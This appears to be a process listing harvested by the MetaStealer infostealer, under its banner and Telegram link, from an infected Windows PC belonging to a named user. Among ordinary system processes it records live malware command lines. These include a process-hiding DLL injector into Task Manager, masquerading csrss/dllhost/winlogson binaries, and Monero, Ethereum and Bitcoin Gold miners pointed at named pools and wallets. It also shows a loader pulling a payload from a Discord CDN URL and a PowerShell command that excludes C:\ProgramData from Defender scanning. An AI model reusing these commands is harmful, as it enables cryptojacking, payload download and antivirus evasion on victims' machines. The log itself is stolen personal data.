***********************************************
* _ _ _ _ *
* / \ / \ / \ / \ *
* ( M | E | T | A ) *
* \_/ \_/ \_/ \_/ *
* *
* Telegram: https://t.me/metastealer_bot *
***********************************************
ID: 772, Name: csrss.exe, CommandLine:
===============
ID: 976, Name: winlogon.exe, CommandLine: winlogon.exe
===============
ID: 544, Name: fontdrvhost.exe, CommandLine: "fontdrvhost.exe"
===============
ID: 1120, Name: dwm.exe, CommandLine: "dwm.exe"
===============
ID: 2188, Name: NVDisplay.Container.exe, CommandLine: "C:\Windows\System32\
DriverStore\FileRepository\nv_dispi.inf_amd64_a24f5f4b6b8a2b86\Display.NvContainer\
NVDisplay.Container.exe" -f %ProgramData%\NVIDIA\DisplaySessionContainer%d.log -d
C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_a24f5f4b6b8a2b86\
Display.NvContainer\plugins\Session -r -l 3 -p 30000 -cfg
NVDisplay.ContainerLocalSystem\Session -c
===============
ID: 4816, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 4836, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s CDPUserSvc
===============
ID: 4872, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s WpnUserService
===============
ID: 4944, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 5140, Name: ctfmon.exe, CommandLine: "ctfmon.exe"
===============
ID: 5324, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
===============
ID: 5676, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 6088, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\
StartMenuExperienceHost.exe" -
ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
===============
ID: 5756, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 6232, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
===============
ID: 6708, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 6924, Name: SkypeBackgroundHost.exe, CommandLine: "C:\Program Files\
WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\
SkypeBackgroundHost.exe" -ServerName:SkypeBackgroundHost
===============
ID: 6952, Name: SkypeApp.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe" -
ServerName:App.AppXffn3yxqvgawq9fpmnhy90fr3y01d1t5b.mca
===============
ID: 7304, Name: mstsca.exe, CommandLine: "C:\Users\Jolo Hook\AppData\Roaming\
Microsoft\Network\mstsca.exe"
===============
ID: 7320, Name: oneetx.exe, CommandLine: C:\Users\JOLOHO~1\AppData\Local\Temp\
10180c8ca3\oneetx.exe
===============
ID: 7408, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 8164, Name: OneDrive.exe, CommandLine: "C:\Users\Jolo Hook\AppData\Local\
Microsoft\OneDrive\OneDrive.exe" /background
===============
ID: 7240, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 1212, Name: csrss.exe, CommandLine: "C:\Windows\rss\csrss.exe"
===============
ID: 7752, Name: injector.exe, CommandLine: "C:\Users\Jolo Hook\AppData\Local\Temp\csrss\injector\injector.exe" taskmgr.exe "C:\Users\Jolo Hook\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll"
===============
ID: 7360, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 7892, Name: TextInputHost.exe, CommandLine: "C:\Windows\SystemApps\
MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -
ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
===============
ID: 7616, Name: dllhost.exe, CommandLine: C:\Windows\system32\DllHost.exe
/Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
===============
ID: 6576, Name: dllhost.exe, CommandLine: C:\ProgramData\Dllhost\dllhost.exe
===============
ID: 3772, Name: iYbixJmp03yRUVNFEZlOA1Od.exe, CommandLine: "C:\Users\Jolo Hook\
Pictures\Minor Policy\iYbixJmp03yRUVNFEZlOA1Od.exe"
===============
ID: 8032, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup
===============
ID: 2356, Name: vbc.exe, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
===============
ID: 8072, Name: 934057bb263593087d4cce4817adb057.exe, CommandLine: "C:\Users\Jolo
Hook\AppData\Local\Temp\csrss\934057bb263593087d4cce4817adb057.exe"
===============
ID: 7880, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 848, Name: 9289.exe, CommandLine: "C:\Users\Jolo Hook\AppData\Local\6f82bd96-
da24-4301-b5ff-137d113838a7\9289.exe" --Task
===============
ID: 6488, Name: taskhostw.exe, CommandLine: taskhostw.exe
===============
ID: 6052, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 6796, Name: wup.exe, CommandLine: "C:\Users\Jolo Hook\AppData\Local\Temp\csrss\wup\xarch\wup.exe" -o dxpools.net:40001 --rig-id 398aded9-2945-4f92-b116-cded84bc354f --tls --nicehash -o dxpools.net:443 --rig-id 398aded9-2945-4f92-b116-cded84bc354f --tls --nicehash -o dxpools.net:80 --rig-id 398aded9-2945-4f92-b116-cded84bc354f --nicehash --http-port 3433 --http-access-token 398aded9-2945-4f92-b116-cded84bc354f --randomx-wrmsr=-1
===============
ID: 7476, Name: ApplicationFrameHost.exe, CommandLine: C:\Windows\system32\
ApplicationFrameHost.exe -Embedding
===============
ID: 3104, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 3248, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 6064, Name: winlogson.exe, CommandLine: C:\ProgramData\Dllhost\winlogson.exe -c config.json
===============
ID: 1396, Name: WinStore.App.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -
ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
===============
ID: 1448, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 6308, Name: Microsoft.Photos.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\
Microsoft.Photos.exe" -ServerName:App.AppXzst44mncqdg84v7sv6p7yznqwssy6f7f.mca
===============
ID: 7732, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 8716, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe -
Embedding
===============
ID: 10208, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 5428, Name: backgroundTaskHost.exe, CommandLine: "C:\Windows\system32\
backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
===============
ID: 9936, Name: taskhostw.exe, CommandLine: taskhostw.exe
===============
ID: 2572, Name: 1PKImfdxRWyn8v24X7hW8T9h.exe, CommandLine: "C:\Users\Jolo Hook\
Pictures\Minor Policy\1PKImfdxRWyn8v24X7hW8T9h.exe"
===============
ID: 7532, Name: c3ipUf96vwdEYEnrFexuolMi.exe, CommandLine: "C:\Users\Jolo Hook\
Pictures\Minor Policy\c3ipUf96vwdEYEnrFexuolMi.exe"
===============
ID: 4696, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 8932, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1929160690
===============
ID: 4896, Name: 7507ffc9a340f774985cb5ca11ca78c4.exe, CommandLine: "C:\Users\Jolo Hook\AppData\Local\Temp\csrss\7507ffc9a340f774985cb5ca11ca78c4.exe" -xor=9487yH74fU54UlmP -m=https://cdn.discordapp.com/attachments/1087398815188910163/1087399135994462378/EupDDwlWsUCMy -btgPool=btg.2miners.com:4040 -btgWallet=GJNo6VDtjHbMx3dp613eZXcPonhaaLQjbf.q -ethWallet=0x1158417B5cC69841d7A5b12a7dC207B6CCd5a834.398aded9-2945-4f92-b116-cded84bc354f -ethPool=eth-eu1.nanopool.org:9999
===============
ID: 6404, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 10072, Name: g.exe, CommandLine: "C:\Users\Jolo Hook\AppData\Local\Temp\csrss\
wup\g.exe" --algo 144_5 --pers BgoldPoW --server btg.2miners.com:4040 --user
GJNo6VDtjHbMx3dp613eZXcPonhaaLQjbf.q --pass x
===============
ID: 8260, Name: g.exe, CommandLine: "C:\Users\Jolo Hook\AppData\Local\Temp\csrss\
wup\g.exe" --algo 144_5 --pers BgoldPoW --server btg.2miners.com:4040 --user
GJNo6VDtjHbMx3dp613eZXcPonhaaLQjbf.q --pass x --watchdog_child_process0
===============
ID: 4564, Name: powershell.exe, CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 9780, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 4984, Name: Acrobat.exe, CommandLine: "C:\Program Files (x86)\Adobe\Acrobat
11.0\Acrobat\Acrobat.exe"
===============
ID: 764, Name: firefox.exe, CommandLine: "C:\Program Files (x86)\Mozilla Firefox\
firefox.exe"
===============
ID: 9704, Name: firefox.exe, CommandLine: "C:\Program Files (x86)\Mozilla Firefox\
firefox.exe" -contentproc --channel="764.0.2017623505\1857316082" -parentBuildID
20230414125621 -prefsHandle 1788 -prefMapHandle 1804 -prefsLen 27751 -prefMapSize
238661 -appDir "C:\Program Files (x86)\Mozilla Firefox\browser" - {cb5f58d8-5fa7-
4e6b-9aef-e4482a7a6242} 764 "\\.\pipe\gecko-crash-server-pipe.764" 1892 12375bc0
gpu
===============
ID: 8812, Name: firefox.exe, CommandLine: "C:\Program Files (x86)\Mozilla Firefox\
firefox.exe" -contentproc --channel="764.1.753322059\639007136" -parentBuildID
20230414125621 -prefsHandle 2232 -prefMapHandle 2228 -prefsLen 27751 -prefMapSize
238661 -win32kLockedDown -appDir "C:\Program Files (x86)\Mozilla Firefox\browser" -
{5314cfe8-70d8-488b-b56b-511968ba8600} 764 "\\.\pipe\gecko-crash-server-pipe.764"
2244 157a4580 socket
===============
ID: 1296, Name: firefox.exe, CommandLine: "C:\Program Files (x86)\Mozilla Firefox\
firefox.exe" -contentproc --channel="764.2.165050635\64864205" -childID 1 -
isForBrowser -prefsHandle 2752 -prefMapHandle 3080 -prefsLen 27957 -prefMapSize
238661 -jsInitHandle 1360 -jsInitLen 240056 -parentBuildID 20230414125621 -
win32kLockedDown -appDir "C:\Program Files (x86)\Mozilla Firefox\browser" -
{d39f9d80-4c95-493f-9c80-0a065b0862bf} 764 "\\.\pipe\gecko-crash-server-pipe.764"
3252 15794840 tab
===============
ID: 6620, Name: firefox.exe, CommandLine: "C:\Program Files (x86)\Mozilla Firefox\
firefox.exe" -contentproc --channel="764.3.316217794\1540459575" -childID 2 -
isForBrowser -prefsHandle 3432 -prefMapHandle 3428 -prefsLen 23946 -prefMapSize
238661 -jsInitHandle 1360 -jsInitLen 240056 -parentBuildID 20230414125621 -
win32kLockedDown -appDir "C:\Program Files (x86)\Mozilla Firefox\browser" -
{8cde1d5d-bcbf-4abe-b9df-18a4e3ee7894} 764 "\\.\pipe\gecko-crash-server-pipe.764"
3176 1ac8a110 tab
===============
ID: 1200, Name: firefox.exe, CommandLine: "C:\Program Files (x86)\Mozilla Firefox\
firefox.exe" -contentproc --channel="764.4.1661110139\1347016648" -childID 3 -
isForBrowser -prefsHandle 3584 -prefMapHandle 3588 -prefsLen 23946 -prefMapSize
238661 -jsInitHandle 1360 -jsInitLen 240056 -parentBuildID 20230414125621 -
win32kLockedDown -appDir "C:\Program Files (x86)\Mozilla Firefox\browser" -
{7d42e0eb-7abe-4b9e-a4fb-ec68bfc1bf60} 764 "\\.\pipe\gecko-crash-server-pipe.764"
3576 1ac8a3f0 tab
===============
ID: 7976, Name: firefox.exe, CommandLine: "C:\Program Files (x86)\Mozilla Firefox\
firefox.exe" -contentproc --channel="764.5.1451481184\255694922" -childID 4 -
isForBrowser -prefsHandle 3724 -prefMapHandle 3728 -prefsLen 23946 -prefMapSize
238661 -jsInitHandle 1360 -jsInitLen 240056 -parentBuildID 20230414125621 -
win32kLockedDown -appDir "C:\Program Files (x86)\Mozilla Firefox\browser" -
{e00712c8-9729-4cd2-86c0-67c798f89611} 764 "\\.\pipe\gecko-crash-server-pipe.764"
3852 1ac8a280 tab